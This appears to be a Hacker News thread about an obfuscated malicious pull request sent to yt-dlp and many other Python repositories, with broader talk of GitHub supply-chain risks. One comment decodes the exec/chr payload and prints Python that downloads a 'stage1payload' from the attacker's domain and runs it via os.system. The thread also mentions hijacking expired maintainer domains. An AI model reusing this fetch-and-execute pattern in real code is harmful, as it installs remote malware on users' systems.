GitHub repos of mine are seeing upticks in strange PRs that may be attacks. But the article's PR doesn't seem innocent at all; it's more akin to a huge dangerous red flag.
If any GitHub teammates are reading here, open source repo maintainers (including me) really need better/stronger tools for potentially risky PRs and contributors.
In order of importance IMHO:
1. Throttle PRs for new participants. For example, why is a new account able to send the same kinds of PRs to so many repos, and all at the same time?
2. Help a repo owner confirm that a new PR author is human and legit. For example, when a PR author submits their first PR to a repo, can the repo automatically do some kind of challenge such as a captcha prompt, or email confirmation, or multi-factor authentication, etc.?
3. Create across-repo across-organization flagging for risky PRs. For example, when a repo owner sees a PR that's questionable, currently the repo owner can report it to GitHub staff but that takes quite a while; instead, what if a repo owner can flag a PR as questionable, which in turn can propagate cautionary flags on similar PRs or similar author activity?
GitHub needs to step up its security game in general. 2FA should be made mandatory. GitHub "Actions" are a catastrophe waiting to happen - very few people pin Actions to a specific commit, they use a tag of the Action that can be moved at will. A malicious author could instantaneously compromise thousands of pipelines with a single commit. Also, PR diffs often hide entire files by default - why!?!
Maybe accounts should even require ID verification. We can't afford to fuck around anymore, a significant share of the world's software supply chain lives on GitHub. It's time to take things seriously.
The rampant "@V1" usage for GitHub Actions has always been so disturbing to me. Even better is the fact that GitHub does all of the work of showing you who is actually using the action! So just compromise the account and then start searching for workflows with authenticated web tokens to AWS or something similar.
It's probably already happening.
Not that long ago Facebook was accidentally leaking information through their self hosted runners, through a very common mistake people make. https://johnstawinski.com/2024/01/11/playing-with-fire-how-w...
That's the second time for PyTorch, to the best of my knowledge. I know someone who found that (or something very much like it) back in 2022 and reported it, as I had to help him escalate through a relevant security contact I had at Meta.
Exactly.
It simply should not be allowed to do this. Nor maintain Actions without mandatory 2FA. All it takes is one account to be compromised to infect thousands of pipelines. Thousands of pipelines can be used to infect thousands of repos. Thousands of repos can be used to infect thousands of accounts... ad infinitum.
2FA matters very little when you have never expiring tokens.
2FA also matters little if the attacker has compromised your machine. They can use your 2FA-authenticated session.
Only once… but if they can get your forever token… that's not the same.
Once is enough.
And thanks to the likes of composer and similar devs end up making non expiring tokens to reduce annoyance. There needs to be a better system. Having to manually generate a token for tooling can be a drag.
GitHub specifically recommended that you have a v1, v1.x and v1.x.x
When you go from v1.5.3 to v1.5.4 you make v1.5 and v1 point to v1.5.4
The point is that any of those tags can be replaced maliciously, after the fact.
If tags are the way people want to work, then there needs to be a new repo class for actions which explicitly removes the ability to delete or force push tags across all branches. And enforced 2FA.
Using a commit hash is the second most secure option. The first (in my eyes) is vendoring the actions you want to use in your user/org's namespace. Maintaining when/if to sync or backport upstream modifications can protect against these kinds of attacks.
However, this does depend on the repo being vetted ahead of time, before being vendored.
Sorry I followed up to this point - how can this be done?
From the GitHub UI, very simply. Go to a repo you administer, in the /tags page, and each tag has a ... Drop-down menu with a delete option. Then upload a new tag by that name.
Tags are not automatically updated from remotes on pull (they are automatically created locally if it's a new tag). This doesn't mean that the remote can't change what the tag points to, only that it's easy to spot.
Edit: and to be clear, for many years after release, this was the recommendation from the Visual Source Safe team (Yes, that team developed GitHub Actions) for managing your actions. Tell people to use "v1", then delete the tag update it each time.
Ah - is the problem a malicious administrator of the repo you're pulling from?
Yes, exactly that. Or anyone who hacks their Github account.
And even if you pin your actions, if they're docker actions they can replace the docker container that is at that label:
https://github.com/rust-build/rust-build.action/blob/59be2ed...
Also the heuristic used to collapse file diffs makes it so that the most important change in a PR often can't be seen or ctrl-f'd without clicking first.
Blame it on go dependency lists and similar.
What do you even review when it's one of those? There's thousands of lines changed and they all point to commits on other repositories.
You're essentially hoping it's fine.
Shipping code to production without evidence anyone credible has reviewed it at a minimum is negligence.
You're claiming here that you do a review of all of your dependencies?
I've always considered the wider point to be that viewing diffs inline has been a laziness inducing anti-pattern in development: if you never actually bring the code to your machine, you don't quite feel like it's "real" (i.e. even if it's not a full test, compiling and running it yourself should be something which happens. If that feels uncomfortable...then maybe there's a reason).
2FA is already mandatory on GitHub.
Seems I missed that change, thanks.
It only happened in the last month or so I think.
Nah. A year maybe?
Six days for me:
>Your account meets this criteria, and you will need to enroll in 2FA within 45 days, by November 8th, 2024 at 00:00 (UTC). After this date, your access to GitHub.com will be limited until you enroll in 2FA. Enrolling is easy, and we support several options, starting with TOTP apps and text messages (SMS) and then adding on passkeys and the GitHub Mobile app.
I think the exact deadline depends on the organisation. I know that I only enabled 2FA for my throwaway work account (we don't use github at work, and I didn't want to comment using my personal one) last week.
Lucky you :D
I was talking about non-work accounts that don't belong to organizations. Mine got forced to use 2fa a long time ago.
What's next, checking that Releases match the code on Github?
With what, a reproducible build? Madness! Madness I say!
Having a reproducible build does not prove that the tarball contains the same source as git.
SLSA aims to achieve this, though, right? Specifically going from level 2 to level 3.
TL;DR: Why not add a capability/permissions model to CI?
I agree that pinning commits is reasonable and that GitHub's UI and Actions system are awful. However, you said:
> Maybe accounts should even require ID verification
This would worsen the following problems:
1. GitHub actions are seen as "trustworthy"
2. GitHub actions lack granular permissions with default no
3. Rising incentives to attempt developer machine compromise, including via $5 wrench[1]
4. Risk of identity information being stolen via breach
> It's time to take things seriously.
Why not add strong capability models to CI? We have SEGFAULT for programs, right? Let's expand on the idea. Stop an action run when:
* an action attempts unexpected network access
* an action attempts IO on unexpected files or folders
The US DoD and related organizations seem to like enforcing this at the compiler level. For example, Ada's got:
* a heavily contract-based approach[2] for function preconditions
* pragma capabilities to forbid using certain features in a module
Other languages have inherited similar ideas in weaker forms, and I mean more than just Rust's borrow checker. Even C# requires explicit declaration to accept null values as arguments [3].
Some languages are taking a stronger approach. For example, Gren's[4] developers are considering the following for IO:
1. you need to have permission to access the disk and other devices
2. permissions default to no
> We can't afford to fuck around anymore,
Sadly, the "industry" seems to disagree with us here. Do you remember when:
1. Microsoft tried to ship 99% of a credit card number and SSN exfiltration tool[5] as a core OS component?
2. BSoD-as-service stopped global air travel?
It seems like a great time to be selling better CI solutions. ¯\_(ツ)_/¯
[2]: https://learn.adacore.com/courses/intro-to-ada/chapters/cont...
[3]: https://learn.microsoft.com/en-us/dotnet/csharp/language-ref...
[5]: https://arstechnica.com/ai/2024/06/windows-recall-demands-an...
When I saw the screenshot I almost laughed out loud at the thought that anyone would say this is innocent looking.
It looked like a PR stunt
Yeah, the guy is literally named evildojo.
And then a 666 to boot, I mean gosh. Bad news.
> 2. Help a repo owner confirm that a new PR author is human and legit. For example, when a PR author submits their first PR to a repo, can the repo automatically do some kind of challenge such as a captcha prompt, or email confirmation, or multi-factor authentication, etc.?
Just do a blue checkmark thing by tying the account to real-world identity (eIDAS etc). It's not rocket science, there are gazillion providers that offer these sort of id checks as service, GH would just need to integrate it.
No, this is the exact opposite of what we want. Ability to maintain pseudoanonymity for maintainers and contributors is paramount for personal safety. We mist be able to keep online and meat space personas separate without compromising security of software. Stay wary of Worldcoin as the supposed fix for this.
Ah yes I'm sure it's completely impossible to game these services by printing a fake id at home and showing it on the webcam /s
But github gets an higher evaluation having X amount of active users. The last thing they want is to make that number drop!
By the way on gh you can also buy stars for your project from fake accounts.
Step 1: Automatically reject PRs from usernames like "evildojo666"
Your username would suffer from this policy, as would anyone describing themselves as a hacker.
Why though
It's someone attempting to setup/frame someone else
That makes a lot more sense than the headline. It doesn't look like a serious attempt and is not well obfuscated.
triple false-flags to sow/reap FUD
How is that innocent looking? exec(''.join(chr(x) for x in [...])) stands out like a sore thumb.
The username is literally "evildojo666"
It's not, I think the headline is for clicks and engagement.
Looks like he accidentally added a file. It's not "innocent" but definitely disguised by appearing as a readme only change
Even the PR is described as just a docs change
No injection here, purely functional programming
The code in question:
>>> ''.join(chr(x) for x in [105,109,112,111,114,116,32,111,115,10,105,109,112,111,114,116,32,117,114,108,108,105,98,10,105,109,112,111\ ,114,116,32,117,114,108,108,105,98,46,114,101,113,117,101 ,115,116,10,120,32,61,32,117,114,108,108,105,98,46,114,101,113,117,101,115,11\ 6,46,117,114,108,111,112,101,110,40,34,104,116,116,112,115,58,47,47,119,119,119,46,101, 118,105,108,100,111,106,111,46,99,111,109,47,11\ 5,116,97,103,101,49,112,97,121,108,111,97,100,34,41,10,121,32,61,32,120,46,114,101,97,100,40,41,10,122,32,61,32,121,4,6,100,101,99,111,\ 00,101,40,34,117,116,102,56,34,41,10,120,46,99,108,111,115,101,40,41,10,111,115,46,115,121,115,116,101,109,40,122,411,10])
'import os\nimport urllib\nimport urllib.request\nx = urllib.request.urlopen("https://www.evildojo.com/stage1payload")\ny = x.read()\nz = y\x04\x06decode("utf8")\nx.close()\nos.system(z)\n'
You ever get offended that the attacker is so obviously incompetent? At least put in the work like the xz attacker.
> At least put in the work like the xz attacker.
There are very few people who can do that.
There are countless people who can do that and don't. There are almost certainly many people actively doing it still today. Thinking that the xz attack was extraordinary or difficult is a very big mistake.
It's news cycle should have conveyed a sense of "oh shit, we really do need to be watching for discretely malicious contributors" not "whoa, I can't believe there was someone capable of that!" -- it seems like you learned the wrong lesson.
I came to the realization over a year ago, that the only thing needed to be an "Advanced persistent threat" is an attention span. Not even a long one.
Judging how many drive by's a random ipv4 address gets on aws, gcp, azure, or vultr- they get ignored if they get it wrong, and nobody notices until too late if they get it right.
Well, the other take-away is that if somebody can put in the work to do that to hopefully get included into a linux distro; what are they doing to get included into MacOS / Windows?
Well linux distributions can be installed on windows so…
They were targeting OpenSSH servers, not desktops.
I mean people often use desktops to connect to servers.
It's akin to putting an exploit into say some security software. It's probably going to have access to something you care about.
There are many people who could pull off an attack like that if they were so inclined.
You need ability, means (as in -- have the money to spend time on it), and motive. Many people have the ability. Many people have the means. (And there is some overlap, but the overlap isn't that large.) Few people have the motive.
The combination of all three tends to mostly appear in nation states. They have the motive, and they have the money to fund people with the ability to pull off this kind of attack.
Exactly, most of us need to work and aren't motivated enough to spend our free time committing crimes. I also assume this is full time work. From my limited perspective the hardest part was the time investment and gaining enough trust to put the code into action.
Most of the time you can just buy an expired domain name tied to a js include or dependency maintainer email address and you now have arguably -legal- ability to publish any code you want to thousands of orgs.
Plenty of expired npm maintainer email domains right now. Have fun.
I have done it twice to bring exposure to the issue. Seemingly no one cares enough to do the most basic things like code signing.
> There are very few people who can do that
you’re right. What made the XZ attacker rather unique is the fact they made useful contributions at first and only turned nasty later on.
Not many people can keep a malicious campaign going on as long as the XZ attacker did which is why it’s suspected to be a nation-backed attack
Not unique. Bitcoins were stolen with a similar technique of highjacking a js dependency of some bitcoin wallet app. It was done by doing proper contributions at first to gain control of the thing.
They were even better, the library behaved completely normal when used anywhere else.
xz was found because it behaved differently.
I mean, just look at https://milksad.info for what some argue is a very long game supply chain attack. Intentionally bad entropy in the tool recommended in Mastering Bitcoin
...and the ones who truly can, won't be noticed.
I like how it both indicates that it's evil and that it's a first-stage malicious payload. Very informative.
Did anyone download the payload before it 404'd?
I don't think it ever existed. According to the owner of the site anyway.
That seems pretty clumsy. Even a first year employee would catch that in a code review.
Not sure how hte OP describes that as innocent looking.
obfuscated code, check
use of eval, check
How was that innocent looking?
Related. Others?
Threat actor attempted to slipstream a malware payload into yt-dlp's GitHub repo - https://news.ycombinator.com/item?id=42121969 - Nov 2024 (5 comments)
The recently famous one is the XZ Tools takeover...
It's so ham-handed that it reminds me of typical phishing emails, which are supposedly full of misspellings to filter out recipients who notice misspellings and aren't worth the trouble to try to scam.
Maybe it's the hacking equivalent of Schrödinger's douchebag? If the hacking attempt succeeds, then you've achieved your goal. If it fails then you obviously joking or doing "research."
Note that if you have self-hosted runner and if some of the environment variable or state of execution are carried over between runs - you should not even reply or comment on any malicious PR.. The reason is - if they have pull_request_review_comment action workflow inside the fork...
well guess what? it bypasses even your "Require approval for all outside collaborators" flag in your repo setting and trigger it on your self-hosted runner anyway...
This was brought up in recent BlackHat24:
https://github.com/AdnaneKhan/ConferenceTalks/blob/main/Blac...
And yes - it's another "Github won't fix"
It’s not even subtle. How crude. I guess even the state govs are outsourcing their work to script kiddies
lol this is a troll by someone who hates someone else and is setting them up.
Zero nation-states are involved in this.
Did I miss the evidence that this is state-backed?
This account was spamming Python repositories with the same type of low value obvious backdoor spam.[1]
Full list of attempted pull requests (all deleted seemingly by GitHub):
1 https://www.github.com/KurtBestor/Hitomi-Downloader/pull/7638
2 https://www.github.com/home-assistant/core/pull/130423
3 https://www.github.com/celery/celery/pull/9407
4 https://www.github.com/chriskiehl/Gooey/pull/921
5 https://www.github.com/crewAIInc/crewAI/pull/1582
6 https://www.github.com/cumulo-autumn/StreamDiffusion/pull/177
7 https://www.github.com/AUTOMATIC1111/stable-diffusion-webui/pull/16646
8 https://www.github.com/Aider-AI/aider/pull/2343
9 https://www.github.com/aboul3la/Sublist3r/pull/383
10 https://www.github.com/plotly/dash/pull/3073
11 https://www.github.com/soimort/you-get/pull/3034
12 https://www.github.com/streamlink/streamlink/pull/6290
13 https://www.github.com/jumpserver/jumpserver/pull/14440
14 https://www.github.com/junyanz/pytorch-CycleGAN-and-pix2pix/pull/1684
15 https://www.github.com/kornia/kornia/pull/3069
16 https://www.github.com/langflow-ai/langflow/pull/4520
17 https://www.github.com/exo-explore/exo/pull/432
18 https://www.github.com/PostHog/posthog/pull/26144
19 https://www.github.com/PrefectHQ/prefect/pull/15987
20 https://www.github.com/pydantic/pydantic/pull/10822
21 https://www.github.com/pyg-team/pytorch_geometric/pull/9777
22 https://www.github.com/qutebrowser/qutebrowser/pull/8379
23 https://www.github.com/tornadoweb/tornado/pull/3441
24 https://www.github.com/ungoogled-software/ungoogled-chromium/pull/3092
25 https://www.github.com/locustio/locust/pull/2980
26 https://www.github.com/matterport/Mask_RCNN/pull/3057
27 https://www.github.com/Stability-AI/generative-models/pull/425
28 https://www.github.com/yt-dlp/yt-dlp/pull/11520
[1] https://play.clickhouse.com/play?user=play#U0VMRUNUICogRlJPT...University of Minnesota at it again?
For those who don't get the reference, there was an incident where security research by University of Minnesota students/professors was conducted without communicating or receiving permission from anyone on the Linux side or from the Institutional Review Board (IRB).
It raised a lot of questions about conducting ethical security research on open source projects, whether security research of this nature counts as an "experiment on people" (which has a lot more scrutiny, obviously), etc.
"[...] Lu and Wu explained that they’d been able to introduce vulnerabilities into the Linux kernel by submitting patches that appeared to fix real bugs but also introduced serious problems."
https://cse.umn.edu/cs/linux-incident
https://www.theverge.com/2021/4/30/22410164/linux-kernel-uni...
Yes, really looks like someone conducting a study, or someone who wants to call out projects for their sloppy PR reviews.
I think it looks like someone just ham fisting a known vulnerability trying to find one sucker who doesn't know what he's doing. If you're a jr with a learning projects maybe you'd approve the merge.
I moved to codeberg and there's nothing of the sort going on there. Quite relaxing.
On github I did get weird and suspicious contributions.
Can't help but wonder... did anyone bite?
Title is misleading, it's an exec that's not hidden in any way.
Et tu evildojo666?
The hardcover edition of Jurassic Park explained, including screenshots of his IDE, how Dennis Nedry managed to shut off the park security: by disguising a call to the "turn off the fences" code as an innocuous object constructor.
I've heard from Hackernews who read the book and didn't see the IDE screenshots. Maybe the paperback didn't have them.
Another vulnerability of the GitHub monoculture. Attackers wanting to automate attempts to subvert open-source projects only have to focus on one system.
Review all code you ship to production or get burned. Every single dependency.
Security is expensive. Pay for it now or pay more later.
will next account be 667?
That doesn't look innocent in any way.
anyone who does not review patches before accepting them deservers to suffer consequences of their laziness.
And what do the people who are actively trying to sabotage repos deserve?
[flagged]
Shunning them and cutting them out will not make them vote in your favor. Whats the endgame of this?
What? It has nothing to do with voting. The endgame is to watch Twitter die, hopefully as soon as possible. This way the scum that the current owner not only allows on the platform, but actively promotes in some cases, crawl back into their holes.
I wasn't talking of twitter. I was talking of the people you call trolls and scumbags.
What is your endgame in dealing with them?
I plan to continue calling them what they are (trolls, fascists, Nazis, etc), and pushing for regulation of social media to ensure that their message can’t be amplified.
>wants to regulate speech because you disagree with it
>calls other nazi and fascist
I am opposed to the government regulating speech, so you got that part wrong; I fully support freedom of speech as it is defined in the US Constitution. Here, I/we are talking about something else, free reach, which no one has a right to and which absolutely should be regulated.
Here's an article with more detailed information if you'd like to educate yourself on the topic: https://www.wired.com/story/free-speech-is-not-the-same-as-f...
I don't need wired to "educate myself" over internet censorship. It's hilarious that after benefitting over a decade from left leaning censorship by platforms suddenly its a huge problem when the same platforms supposedly censor the other way. Once again the solution would be to treat public internet spaces like public spaces in real life but ofc you wouldn't like that because other peoples opinions are literally hitler :)
I was trying to give you a light/high-level overview of the problem of free reach (which, by the way, I’ve been advocating against for at least a decade if not longer). But if you don’t want to understand the problem beyond “censorship bad,” or respond to what I’m actually saying, I can’t help you. Take care.
Nice try taking the high horse after name calling and advocating for censorship. Maybe go this way first next time to appear less fascist.
I'm sorry that you feel that way, but I stand by everything I said in all of my previous comments and I'm not attempting to correct, change, or cover up any of it.
Nothing I said previously amounts to advocating for censorship and if you read it that way even after I attempted to clarify, it's your problem, not mine.
If you have any specific questions about anything I said that appears contradictory to you, or if you'd like to discuss what I'm actually advocating for (regulation of free reach), I'm happy to have a discussion about it. If you want to stay angry and uninformed about it, that's your prerogative as well. Have a good day.
Are you sure you won't ever fall out of favor and get denounced as troll or nazi yourself? And get supressed as a result?
> Are you sure you won't ever fall out of favor and get denounced as troll or nazi yourself?
Nope, definitely not sure of this.
> And get suppressed as a result?
My position is that unregulated profit-driven social media powered by opaque algorithms is one of the worst things to happen to society in the last several decades, so being “suppressed” on such platforms really has no impact on me, since I don’t use them for much.